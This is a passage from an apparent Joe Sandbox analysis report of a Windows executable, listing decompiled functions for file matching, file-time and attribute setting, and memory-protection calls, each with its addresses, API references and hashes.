							} else {
								_t150 = _v336.cAlternateFileName;
								_t197 = _v36;
								goto L9;
							}
							goto L68;
						}
						L25:
						E00A5B562( &_v36);
						_t91 = _t198;
						goto L26;
					}
				} else {
					_t147 = E00A591A8();
					_t217 = 0x16;
					 *_t147 = _t217;
					E00A59087();
					_t91 = _t217;
					L26:
					return _t91;
				}
				L68:
			}

0x00a5b1bd
0x00a5b1c0
0x00a5b1c6
0x00a5b1de
0x00a5b1e1
0x00a5b1e5
0x00a5b1e7
0x00a5b1e9
0x00a5b1eb
0x00a5b1ee
0x00a5b1f1
0x00a5b1f4
0x00a5b1f6
0x00a5b24e
0x00a5b24e
0x00a5b254
0x00a5b256
0x00a5b261
0x00a5b265
0x00a5b267
0x00a5b26a
0x00a5b26e
0x00a5b26e
0x00a5b270
0x00a5b272
0x00a5b274
0x00a5b276
0x00a5b276
0x00a5b278
0x00a5b27b
0x00a5b27e
0x00a5b27e
0x00a5b280
0x00a5b281
0x00a5b281
0x00a5b28c
0x00a5b28e
0x00a5b291
0x00a5b292
0x00a5b295
0x00a5b295
0x00a5b299
0x00a5b29c
0x00a5b29f
0x00a5b29f
0x00a5b2ad
0x00a5b2af
0x00a5b2b2
0x00a5b2b4
0x00a5b2be
0x00a5b2c1
0x00a5b2c4
0x00a5b2c6
0x00a5b2c9
0x00a5b2cb
0x00a5b31b
0x00a5b31e
0x00a5b31e
0x00a5b320
0x00000000
0x00a5b2cd
0x00a5b2cf
0x00a5b2cf
0x00a5b2d1
0x00a5b2d4
0x00a5b2d4
0x00a5b2d9
0x00a5b2dc
0x00a5b2dc
0x00a5b2de
0x00a5b2df
0x00a5b2df
0x00a5b2e3
0x00a5b2e6
0x00a5b2e6
0x00a5b2e9
0x00a5b2ec
0x00a5b2f9
0x00a5b2fe
0x00a5b301
0x00a5b303
0x00a5b33d
0x00a5b33e
0x00a5b33f
0x00a5b340
0x00a5b341
0x00a5b342
0x00a5b347
0x00a5b34b
0x00a5b34d
0x00a5b34e
0x00a5b351
0x00a5b351
0x00a5b354
0x00a5b354
0x00a5b356
0x00a5b357
0x00a5b357
0x00a5b360
0x00a5b361
0x00a5b364
0x00a5b367
0x00a5b36a
0x00a5b36c
0x00a5b373
0x00a5b375
0x00a5b378
0x00a5b382
0x00a5b385
0x00a5b386
0x00a5b388
0x00a5b39c
0x00a5b39c
0x00a5b39f
0x00a5b3a9
0x00a5b3ae
0x00a5b3b1
0x00a5b3b3
0x00000000
0x00a5b3b5
0x00a5b3b9
0x00a5b3c2
0x00a5b3c8
0x00000000
0x00a5b3cb
0x00a5b38a
0x00a5b38a
0x00a5b390
0x00a5b395
0x00a5b398
0x00a5b39a
0x00a5b3d1
0x00a5b3d3
0x00a5b3d4
0x00a5b3d5
0x00a5b3d6
0x00a5b3d7
0x00a5b3d8
0x00a5b3dd
0x00a5b3e0
0x00a5b3e1
0x00a5b3e3
0x00a5b3e9
0x00a5b3f0
0x00a5b3f3
0x00a5b3f6
0x00a5b3f7
0x00a5b3fa
0x00a5b3fb
0x00a5b3fe
0x00a5b3ff
0x00a5b420
0x00a5b420
0x00a5b422
0x00000000
0x00000000
0x00a5b407
0x00a5b409
0x00a5b40b
0x00a5b40d
0x00a5b40f
0x00a5b411
0x00a5b413
0x00a5b41e
0x00000000
0x00a5b41e
0x00a5b413
0x00a5b40f
0x00000000
0x00a5b40b
0x00a5b424
0x00a5b426
0x00a5b429
0x00a5b442
0x00a5b442
0x00a5b444
0x00a5b447
0x00a5b457
0x00a5b459
0x00a5b459
0x00a5b449
0x00a5b449
0x00a5b44c
0x00000000
0x00a5b44e
0x00a5b44e
0x00a5b451
0x00000000
0x00a5b453
0x00a5b453
0x00a5b453
0x00a5b451
0x00a5b44c
0x00a5b467
0x00a5b46b
0x00a5b479
0x00a5b47e
0x00a5b493
0x00a5b495
0x00a5b49b
0x00a5b49e
0x00a5b4d0
0x00a5b4d0
0x00a5b4d5
0x00a5b4db
0x00a5b4db
0x00a5b4e2
0x00a5b4fc
0x00a5b4fc
0x00a5b4fd
0x00a5b503
0x00a5b509
0x00a5b50a
0x00a5b50b
0x00a5b510
0x00a5b513
0x00a5b515
0x00000000
0x00000000
0x00000000
0x00000000
0x00a5b4e4
0x00a5b4e4
0x00a5b4ea
0x00a5b4ec
0x00000000
0x00a5b4ee
0x00a5b4ee
0x00a5b4f1
0x00000000
0x00a5b4f3
0x00a5b4f3
0x00a5b4fa
0x00000000
0x00000000
0x00000000
0x00000000
0x00a5b4fa
0x00a5b4f1
0x00a5b4ec
0x00000000
0x00a5b517
0x00a5b51f
0x00a5b525
0x00a5b527
0x00a5b527
0x00a5b52f
0x00a5b534
0x00a5b53c
0x00a5b53f
0x00a5b541
0x00a5b555
0x00a5b55a
0x00a5b4a0
0x00a5b4a0
0x00a5b4a1
0x00a5b4a2
0x00a5b4a3
0x00a5b4a4
0x00a5b4ac
0x00a5b4ac
0x00a5b4ac
0x00a5b4ae
0x00a5b4b1
0x00a5b4b4
0x00a5b4b4
0x00a5b4ba
0x00a5b42b
0x00a5b42b
0x00a5b42e
0x00a5b430
0x00000000
0x00a5b432
0x00a5b432
0x00a5b435
0x00a5b436
0x00a5b437
0x00a5b438
0x00a5b43d
0x00a5b430
0x00a5b4bc
0x00a5b4bf
0x00a5b4c0
0x00a5b4c1
0x00a5b4c3
0x00a5b4cc
0x00000000
0x00000000
0x00000000
0x00a5b39a
0x00a5b36e
0x00a5b370
0x00a5b3cc
0x00a5b3d0
0x00a5b3d0
0x00000000
0x00000000
0x00000000
0x00000000
0x00a5b305
0x00a5b308
0x00a5b30b
0x00a5b30e
0x00a5b311
0x00a5b314
0x00a5b317
0x00a5b317
0x00000000
0x00a5b2d4
0x00a5b2b6
0x00a5b2b6
0x00a5b322
0x00a5b324
0x00000000
0x00a5b329
0x00a5b1f8
0x00a5b1f8
0x00a5b1fb
0x00a5b204
0x00a5b207
0x00a5b20e
0x00a5b210
0x00a5b229
0x00a5b22a
0x00a5b22b
0x00a5b22d
0x00a5b232
0x00a5b212
0x00a5b212
0x00a5b215
0x00a5b216
0x00a5b218
0x00a5b21a
0x00a5b21c
0x00a5b221
0x00a5b221
0x00a5b235
0x00a5b237
0x00a5b239
0x00000000
0x00000000
0x00a5b23f
0x00a5b242
0x00a5b244
0x00a5b246
0x00000000
0x00a5b248
0x00a5b248
0x00a5b24b
0x00000000
0x00a5b24b
0x00000000
0x00a5b246
0x00a5b32a
0x00a5b32d
0x00a5b332
0x00000000
0x00a5b335
0x00a5b1c8
0x00a5b1c8
0x00a5b1cf
0x00a5b1d0
0x00a5b1d2
0x00a5b1d7
0x00a5b336
0x00a5b33a
0x00a5b33a
0x00000000

APIs

_free.LIBCMT ref: 00A5B324

Part of subcall function 00A59097: IsProcessorFeaturePresent.KERNEL32(00000017,00A59086,00000000,00A58D94,00000000,00000000,00000000,00000016,?,?,00A59093,00000000,00000000,00000000,00000000,00000000), ref: 00A59099
Part of subcall function 00A59097: GetCurrentProcess.KERNEL32(C0000417,00A58D94,00000000,?,00000003,00A59868), ref: 00A590BB
Part of subcall function 00A59097: TerminateProcess.KERNEL32(00000000,?,00000003,00A59868), ref: 00A590C2

Strings

*?, xrefs: 00A5B1FB
., xrefs: 00A5B4DB

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: 871087a43f0bd1cbd1098384f5f5eb82fa4a5fd881eee7424b44ab4bf77dde44
Instruction ID: b66f8f807a26c2a092fa12567ebd37f1ff066f8f67ffb283d4950055e614a19d
Opcode Fuzzy Hash: 871087a43f0bd1cbd1098384f5f5eb82fa4a5fd881eee7424b44ab4bf77dde44
Instruction Fuzzy Hash: 16517F71E1020AEFDF14DFA8C881AEDBBB5FF58312F248169E854E7340E7359A058B60

Uniqueness

Uniqueness Score: -1.00%

Function 00A375DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137
timeCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00A375DE(void* __ecx) {
				void* __esi;
				char _t55;
				signed int _t58;
				void* _t62;
				signed int _t63;
				signed int _t69;
				signed int _t86;
				void* _t91;
				void* _t101;
				intOrPtr* _t106;
				void* _t108;

				E00A4EB78(0xa627e9, _t108);
				E00A4EC50(0x60f8);
				_t106 =  *((intOrPtr*)(_t108 + 0xc));
				if( *_t106 == 0) {
					L3:
					_t101 = 0x802;
					E00A40602(_t108 - 0x1014, _t106, 0x802);
					L4:
					_t82 =  *((intOrPtr*)(_t108 + 8));
					E00A377DF(_t106,  *((intOrPtr*)(_t108 + 8)), _t108 - 0x4094, 0x800);
					_t113 =  *((short*)(_t108 - 0x4094)) - 0x3a;
					if( *((short*)(_t108 - 0x4094)) == 0x3a) {
						__eflags =  *((char*)(_t108 + 0x10));
						if(__eflags == 0) {
							E00A405DA(__eflags, _t108 - 0x1014, _t108 - 0x4094, _t101);
							E00A36EDB(_t108 - 0x3094);
							_push(0);
							_t55 = E00A3A56D(_t108 - 0x3094, __eflags, _t106, _t108 - 0x3094);
							_t86 =  *(_t108 - 0x208c);
							 *((char*)(_t108 - 0xd)) = _t55;
							__eflags = _t86 & 0x00000001;
							if((_t86 & 0x00000001) != 0) {
								__eflags = _t86 & 0xfffffffe;
								E00A3A4ED(_t106, _t86 & 0xfffffffe);
							}
							E00A39556(_t108 - 0x204c);
							 *((intOrPtr*)(_t108 - 4)) = 1;
							_t58 = E00A39F1A(_t108 - 0x204c, __eflags, _t108 - 0x1014, 0x11);
							__eflags = _t58;
							if(_t58 != 0) {
								_push(0);
								_push(_t108 - 0x204c);
								_push(0);
								_t69 = E00A33BBA(_t82);
								__eflags = _t69;
								if(_t69 != 0) {
									E00A39620(_t108 - 0x204c);
								}
							}
							E00A39556(_t108 - 0x50cc);
							__eflags =  *((char*)(_t108 - 0xd));
							 *((char*)(_t108 - 4)) = 2;
							if( *((char*)(_t108 - 0xd)) != 0) {
								_t63 = E00A398E0(_t108 - 0x50cc, _t106, _t106, 5);
								__eflags = _t63;
								if(_t63 != 0) {
									SetFileTime( *(_t108 - 0x50c4), _t108 - 0x206c, _t108 - 0x2064, _t108 - 0x205c);
								}
							}
							E00A3A4ED(_t106,  *(_t108 - 0x208c));
							E00A3959A(_t108 - 0x50cc);
							_t91 = _t108 - 0x204c;
						} else {
							E00A39556(_t108 - 0x6104);
							_push(1);
							_push(_t108 - 0x6104);
							_push(0);
							 *((intOrPtr*)(_t108 - 4)) = 0;
							E00A33BBA(_t82);
							_t91 = _t108 - 0x6104;
						}
						_t62 = E00A3959A(_t91);
					} else {
						E00A32021(_t113, 0x53, _t82 + 0x32, _t106);
						_t62 = E00A36D83(0xa71098, 3);
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t108 - 0xc));
					return _t62;
				}
				_t112 =  *((intOrPtr*)(_t106 + 2));
				if( *((intOrPtr*)(_t106 + 2)) != 0) {
					goto L3;
				} else {
					_t101 = 0x802;
					E00A40602(_t108 - 0x1014, 0xa637a0, 0x802);
					E00A405DA(_t112, _t108 - 0x1014, _t106, 0x802);
					goto L4;
				}
			}

0x00a375e3
0x00a375ed
0x00a375f4
0x00a375fd
0x00a3762c
0x00a3762c
0x00a3763a
0x00a3763f
0x00a3763f
0x00a3764f
0x00a37654
0x00a3765c
0x00a3767b
0x00a3767f
0x00a376bc
0x00a376c7
0x00a376d4
0x00a376d7
0x00a376dc
0x00a376e2
0x00a376e5
0x00a376e8
0x00a376ea
0x00a376ef
0x00a376ef
0x00a376fa
0x00a37707
0x00a37715
0x00a3771a
0x00a3771c
0x00a3771e
0x00a37727
0x00a37728
0x00a37729
0x00a3772e
0x00a37730
0x00a37738
0x00a37738
0x00a37730
0x00a37743
0x00a37748
0x00a3774c
0x00a37750
0x00a3775b
0x00a37760
0x00a37762
0x00a3777f
0x00a3777f
0x00a37762
0x00a3778c
0x00a37797
0x00a3779c
0x00a37681
0x00a37687
0x00a3768c
0x00a37696
0x00a37697
0x00a3769a
0x00a3769d
0x00a376a2
0x00a376a2
0x00a377a2
0x00a3765e
0x00a37665
0x00a37671
0x00a37671
0x00a377ad
0x00a377b5
0x00a377b5
0x00a375ff
0x00a37603
0x00000000
0x00a37605
0x00a37605
0x00a37617
0x00a37625
0x00000000
0x00a37625

APIs

__EH_prolog.LIBCMT ref: 00A375E3

Part of subcall function 00A405DA: _wcslen.LIBCMT ref: 00A405E0

Part of subcall function 00A3A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00A3A598

SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00A3777F

Part of subcall function 00A3A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00A3A325,?,?,?,00A3A175,?,00000001,00000000,?,?), ref: 00A3A501
Part of subcall function 00A3A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00A3A325,?,?,?,00A3A175,?,00000001,00000000,?,?), ref: 00A3A532

Strings

:, xrefs: 00A37654

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: File$Attributes$CloseFindH_prologTime_wcslen
String ID: :
API String ID: 3226429890-336475711
Opcode ID: 27f82128e38a3a16900a319f419024e8c7be3763e0158aff72d14147784bfeee
Instruction ID: d52c4a3cc45da84674db12192ff21fd50a13c1c95f509cff9b7d7e5e35da05b0
Opcode Fuzzy Hash: 27f82128e38a3a16900a319f419024e8c7be3763e0158aff72d14147784bfeee
Instruction Fuzzy Hash: AD4161B1805158AAEB35EB64CD56EEEB37CEF55300F008096B649A2092DB745F89CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00A3B37A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00A3B37A() {
				void* __ecx;
				signed int _t23;
				signed int _t25;
				void* _t27;
				void* _t31;
				signed int _t35;
				void* _t39;
				void* _t40;
				signed int _t41;
				intOrPtr _t42;
				void* _t46;
				signed int _t49;
				void* _t50;
				signed int _t51;
				void* _t52;
				signed short* _t53;
				signed short* _t55;
				signed short* _t56;
				void* _t57;

				_t56 =  *(_t57 + 0x14);
				_t55 =  *(_t57 + 0x1c);
				 *(_t57 + 0x18) = 0x2a;
				_t39 = 0x2e;
				while(1) {
					 *(_t57 + 0x18) = _t56;
					_t51 = E00A3B4EC( *_t55 & 0x0000ffff,  *((intOrPtr*)(_t57 + 0x24))) & 0x0000ffff;
					_t41 = E00A3B4EC( *_t56 & 0x0000ffff,  *((intOrPtr*)(_t57 + 0x24))) & 0x0000ffff;
					_t56 =  &(_t56[1]);
					_t49 = _t41;
					_t23 = _t41;
					if(_t49 == 0) {
						break;
					}
					if(_t49 ==  *(_t57 + 0x14)) {
						_t25 =  *_t56 & 0x0000ffff;
						if(_t25 == 0) {
							L28:
							return 1;
						}
						_t50 = 0x2e;
						_t40 = 0;
						if(_t25 != _t50) {
							L26:
							while( *_t55 != _t40) {
								_push( *((intOrPtr*)(_t57 + 0x24)));
								_push(_t55);
								_push(_t56);
								_t27 = E00A3B37A();
								_t55 =  &(_t55[1]);
								if(_t27 != 0) {
									goto L28;
								}
							}
							L27:
							return 0;
						}
						_t42 =  *((intOrPtr*)(_t57 + 0x10));
						_t52 = 0x2a;
						if( *((intOrPtr*)(_t42 + 4)) != _t52 ||  *((intOrPtr*)(_t42 + 6)) != 0) {
							_push(_t50);
							_push(_t55);
							_t53 = E00A522C6(_t42);
							if(( *(_t57 + 0x18))[2] != _t40) {
								if(_t53 == 0) {
									goto L26;
								}
								_t55 = _t53;
								_t31 = E00A56105(_t56, L"*?");
								_pop(_t46);
								if(_t31 != 0) {
									goto L26;
								}
								_t54 =  &(_t53[1]);
								_push(0x2e);
								_push( &(_t53[1]));
								if(E00A522C6(_t46) != 0) {
									goto L26;
								}
								_t35 = E00A3B4CB( &(( *(_t57 + 0x14))[2]), _t54,  *((intOrPtr*)(_t57 + 0x24)));
								asm("sbb al, al");
								return  ~_t35 + 1;
							}
							if(_t53 == 0 || _t53[1] == _t40) {
								_t40 = 1;
							}
							return _t40;
						} else {
							goto L28;
						}
					}
					if(_t41 == 0x3f) {
						if(_t51 == 0) {
							goto L27;
						}
						L11:
						_t55 =  &(_t55[1]);
						continue;
					}
					if(_t23 == _t51) {
						goto L11;
					}
					if(_t23 != _t39) {
						goto L27;
					}
					if(_t51 == 0 || _t51 == 0x5c || _t51 == _t39) {
						continue;
					} else {
						goto L27;
					}
				}
				return _t23 & 0xffffff00 | _t51 == 0x00000000;
			}

0x00a3b37e
0x00a3b383
0x00a3b38a
0x00a3b392
0x00a3b393
0x00a3b39b
0x00a3b3a8
0x00a3b3b5
0x00a3b3b8
0x00a3b3bb
0x00a3b3bd
0x00a3b3c2
0x00000000
0x00000000
0x00a3b3cd
0x00a3b404
0x00a3b40b
0x00a3b4b8
0x00000000
0x00a3b4b8
0x00a3b413
0x00a3b414
0x00a3b419
0x00000000
0x00a3b4af
0x00a3b49d
0x00a3b4a1
0x00a3b4a2
0x00a3b4a3
0x00a3b4a8
0x00a3b4ad
0x00000000
0x00000000
0x00a3b4ad
0x00a3b4b4
0x00000000
0x00a3b4b4
0x00a3b41f
0x00a3b425
0x00a3b42a
0x00a3b436
0x00a3b437
0x00a3b43d
0x00a3b449
0x00a3b45d
0x00000000
0x00000000
0x00a3b465
0x00a3b467
0x00a3b46d
0x00a3b470
0x00000000
0x00000000
0x00a3b472
0x00a3b475
0x00a3b477
0x00a3b481
0x00000000
0x00000000
0x00a3b490
0x00a3b497
0x00000000
0x00a3b499
0x00a3b44d
0x00a3b455
0x00a3b455
0x00000000
0x00000000
0x00000000
0x00000000
0x00a3b42a
0x00a3b3d2
0x00a3b3f9
0x00000000
0x00000000
0x00a3b3ff
0x00a3b3ff
0x00000000
0x00a3b3ff
0x00a3b3d7
0x00000000
0x00000000
0x00a3b3dc
0x00000000
0x00000000
0x00a3b3e5
0x00000000
0x00a3b3f1
0x00000000
0x00a3b3f1
0x00a3b3e5
0x00000000

APIs

_wcschr.LIBVCRUNTIME ref: 00A3B438
_wcschr.LIBVCRUNTIME ref: 00A3B478

Strings

*, xrefs: 00A3B38A

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: _wcschr
String ID: *
API String ID: 2691759472-163128923
Opcode ID: 02e1d0a3bc770c883ab3d7bae0ce852c7cf2b05af921824770c4f0ecf2ae28bd
Instruction ID: 813f58a34bf7aa87bc3dbfcf41f10cca1cb035a738ad9045e5742116435fab50
Opcode Fuzzy Hash: 02e1d0a3bc770c883ab3d7bae0ce852c7cf2b05af921824770c4f0ecf2ae28bd
Instruction Fuzzy Hash: 15314632564311AACB30EF149902A7B73E7EFD1B20F14801EFB8857143E7268D82937A

Uniqueness

Uniqueness Score: -1.00%

Function 00A4B48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 26%

			E00A4B48E(void* __ecx, void* __edx, void* __eflags, char _a3, char _a4, char _a7, char _a8, intOrPtr* _a8200) {
				void* __edi;
				void* __ebp;
				intOrPtr _t20;
				short* _t31;
				intOrPtr* _t33;
				signed int _t41;
				intOrPtr* _t42;
				void* _t44;

				E00A4EC50(0x2004);
				_push(0x80000);
				_t42 = E00A53E33(__ecx);
				if(_t42 == 0) {
					E00A36CA7(0xa71098);
				}
				_t33 = _a8200;
				 *_t42 = 0;
				_t41 = 0;
				while(1) {
					_push(0x1000);
					_push( &_a3);
					_push(0);
					_push(0);
					_push( &_a4);
					_push( *_t33);
					_t20 = E00A4B314(_t41, 0);
					 *_t33 = _t20;
					if(_t20 == 0) {
						break;
					}
					if( *_t42 != 0 || _a8 != 0x7b) {
						if(_a8 == 0x7d || E00A53E13( &_a8) + _t41 > 0x3fffb) {
							break;
						} else {
							E00A57686(_t42,  &_a8);
							_t41 = E00A53E13(_t42);
							_t44 = _t44 + 0xc;
							if(_t41 == 0) {
								L11:
								if(_a7 == 0) {
									E00A56066(_t42 + _t41 * 2, L"\r\n");
								}
								continue;
							}
							_t6 = _t41 - 1; // -1
							_t31 = _t42 + _t6 * 2;
							while( *_t31 == 0x20) {
								_t31 = _t31 - 2;
								_t41 = _t41 - 1;
								if(_t41 != 0) {
									continue;
								}
								goto L11;
							}
							goto L11;
						}
					} else {
						continue;
					}
				}
				return _t42;
			}

0x00a4b493
0x00a4b49c
0x00a4b4a6
0x00a4b4ab
0x00a4b4b2
0x00a4b4b2
0x00a4b4b7
0x00a4b4c2
0x00a4b4c5
0x00a4b537
0x00a4b537
0x00a4b540
0x00a4b541
0x00a4b542
0x00a4b547
0x00a4b548
0x00a4b54a
0x00a4b54f
0x00a4b553
0x00000000
0x00000000
0x00a4b4cc
0x00a4b4dc
0x00000000
0x00a4b4f2
0x00a4b4f8
0x00a4b503
0x00a4b505
0x00a4b50a
0x00a4b520
0x00a4b525
0x00a4b530
0x00a4b536
0x00000000
0x00a4b525
0x00a4b50c
0x00a4b50f
0x00a4b512
0x00a4b518
0x00a4b51b
0x00a4b51e
0x00000000
0x00000000
0x00000000
0x00a4b51e
0x00000000
0x00a4b512
0x00000000
0x00000000
0x00000000
0x00a4b4cc
0x00a4b565

APIs

_wcslen.LIBCMT ref: 00A4B4E3
_wcslen.LIBCMT ref: 00A4B4FE

Strings

}, xrefs: 00A4B4D6

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: _wcslen
String ID: }
API String ID: 176396367-4239843852
Opcode ID: 5fff244215bb0250d572cca17bf2e53e77aae3f368b738885c457160ce608fe2
Instruction ID: d4512ac8e0456a6a1e129f6758bfe1ac8b9b99e3bb4f5e81b1204fd52d729c63
Opcode Fuzzy Hash: 5fff244215bb0250d572cca17bf2e53e77aae3f368b738885c457160ce608fe2
Instruction Fuzzy Hash: 5121DE7692430A5ADB31EB68D945A6AB3ECEFD0751F04042AFA41C3141EB75ED4883B3

Uniqueness

Uniqueness Score: -1.00%

Function 00A3F344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00A3F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00A3F2E4
Part of subcall function 00A3F2C5: GetProcAddress.KERNEL32(00A781C8,CryptUnprotectMemory), ref: 00A3F2F4

GetCurrentProcessId.KERNEL32(?,?,?,00A3F33E), ref: 00A3F3D2

Strings

CryptProtectMemory failed, xrefs: 00A3F389
CryptUnprotectMemory failed, xrefs: 00A3F3CA

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 5ea08152b67faf1fab92802fa5a637a36b9f1bfcd5b770ac1acb974d0111e7e5
Instruction ID: 2fbe4dacfc4c51687b6ba73e70277ac5a439a698af30b7cf439eeb973a25373a
Opcode Fuzzy Hash: 5ea08152b67faf1fab92802fa5a637a36b9f1bfcd5b770ac1acb974d0111e7e5
Instruction Fuzzy Hash: 3B112232E01629AFDF11AF70DD45A6E3B64FF00B60F10812AFC255F291DA789E438690

Uniqueness

Uniqueness Score: -1.00%

Function 00A31316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00A31316(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, signed int _a28) {
				struct HWND__* _t20;
				struct HWND__* _t21;

				if(_a8 == 0x30) {
					E00A3E2C1(0xa71030, _a4);
				} else {
					_t27 = _a8 - 0x110;
					if(_a8 == 0x110) {
						E00A3E2E8(0xa71030, __edx, _t27, _a4, _a20, _a28 & 1);
						if((_a28 & 0x00000001) != 0) {
							_t20 =  *0xa93154(_a4);
							if(_t20 != 0) {
								_t21 = GetDlgItem(_t20, 0x3021);
								if(_t21 != 0 && (_a28 & 0x00000008) != 0) {
									SetWindowTextW(_t21, 0xa635f4);
								}
							}
						}
					}
				}
				return 0;
			}

0x00a3131d
0x00a31380
0x00a3131f
0x00a3131f
0x00a31326
0x00a3133c
0x00a31345
0x00a3134a
0x00a31352
0x00a3135a
0x00a31362
0x00a31370
0x00a31370
0x00a31362
0x00a31352
0x00a31345
0x00a31326
0x00a31388

APIs

Part of subcall function 00A3E2E8: _swprintf.LIBCMT ref: 00A3E30E
Part of subcall function 00A3E2E8: _strlen.LIBCMT ref: 00A3E32F
Part of subcall function 00A3E2E8: SetDlgItemTextW.USER32(?,00A6E274,?), ref: 00A3E38F
Part of subcall function 00A3E2E8: GetWindowRect.USER32(?,?), ref: 00A3E3C9
Part of subcall function 00A3E2E8: GetClientRect.USER32(?,?), ref: 00A3E3D5

GetDlgItem.USER32(00000000,00003021), ref: 00A3135A
SetWindowTextW.USER32(00000000,00A635F4), ref: 00A31370

Strings

0, xrefs: 00A31319

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
